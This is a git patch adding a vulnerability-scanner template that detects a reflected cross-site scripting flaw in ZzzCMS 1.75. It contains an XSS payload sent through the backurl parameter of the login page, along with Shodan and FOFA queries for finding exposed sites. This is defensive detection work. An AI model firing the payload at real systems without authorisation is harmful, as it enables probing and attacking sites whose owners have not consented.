From cf6628114b7cf1ad058cffc477de155a8a157664 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 7 Aug 2023 23:26:47 +0530 Subject: [PATCH] Create zzzcms-xss.yaml --- http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 36 +++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/zzzcms/zzzcms-xss.yaml diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml new file mode 100644 index 0000000000..68c7d8247b --- /dev/null +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -0,0 +1,36 @@ +id: zzzcms-xss + +info: + name: Zzzcms 1.75 - Cross-Site Scripting + author: ritikchaddha + severity: medium + metadata: + max-request: 1 + verified: true + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,xss + +http: + - raw: + - | + GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/XSS/)%20y%3d HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(/XSS/) y=&act' + - 'document.write("' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200